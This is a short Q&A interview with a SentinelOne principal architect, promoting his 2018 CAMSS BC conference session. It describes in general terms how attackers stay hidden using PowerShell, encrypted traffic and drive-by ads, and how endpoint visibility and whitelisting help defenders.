"What are the advanced attackers hiding?"
Chris Bates, Principal Architect, SentinelOne
In preparation for the 2018 CAMSS BC conference, we caught up with Chris Bates, Principal Architect at SentinelOne to gain some insight in to his session focused on "what are the advanced attackers are hiding?".
1. Advanced attackers are always looking for ways to stay hidden. What simple methods are they using to hide their threats and communication channels?
Attackers are starting to leverage tools and systems already in the environment to launch attacks and stay hidden. A simple example is Microsoft Powershell, a tool that is installed on every windows machine. This tool allows an attacker to compromise a system without having to use malware. They also use encrypted TLS channels over 443 or short dns names to further hide the compromise.
2. Can you explain some of the threats lurking inside encrypted traffic at the endpoint?
Over 50% of the web traffic today is HTTPS / TLS. Since most tools cant seen inside this how does an organization know the data going to Box, or OneDrive, or GetHUB is something that should normally happen or an attacker stealing data. Another common them to compromise encrypted AD networks on popular sites and use them to deliver what is known as "Drive-by" malware.
3. In what ways are companies now able to both detect and respond to formerly "unseeable" threats?
Detecting and responding to "unseeable' threats is really done one of two ways. The first is to prevent the attack surface all together. An example of this is Script Control or Application Whitelisting. While this way does increase security it comes with a high overhead cost in terms of maintenance and impact to end users and business processes.
The second approach is about visibility. If I can now see the "unseeable" threat then I can deal with it. To this end tools are starting to break or see inside encrypted traffic in the case of TLS. This approach offers more in the way of dynamic protection without high overhead or business impacting costs.
4. What dangers to companies face by ignoring these threats both now and in the future? How can the problems escalate?
Breaches, regardless of if they are insider threat based or a malicious outsider continue to cause damage the longer they are "alive" in the environment. If a company doesn't have the skills and tools to find the hidden actors then the damage continues until they are usually informed by a 3rd party. Once informed of a breach the company then has to pay for high prices teams to come in and uncover the hidden threat and expel them. In short, history has shown breaches are always cheaper to deal with before they happen proactively than reactively.
5. How is SentinelOne positioned to assist?
The autonomous SentinelOne endpoint platform has complete visibility into the places attackers like to try to exploit and hide. The platform uses this visibility to automatically stop the attackers as they try to gain a foothold in the environment regardless of how they try to hide.
6. At the forthcoming CAMSS B.C. conference in Vancouver, you will be leading a session on this very topic. What do you ultimately want the participants to take away from the discussion?
Attackers are moving away from common malware and moving to attacks that "live of the land" and exploit tools and systems already in place. Companies need to have and execute on a plan to deal with this emerging attack surface.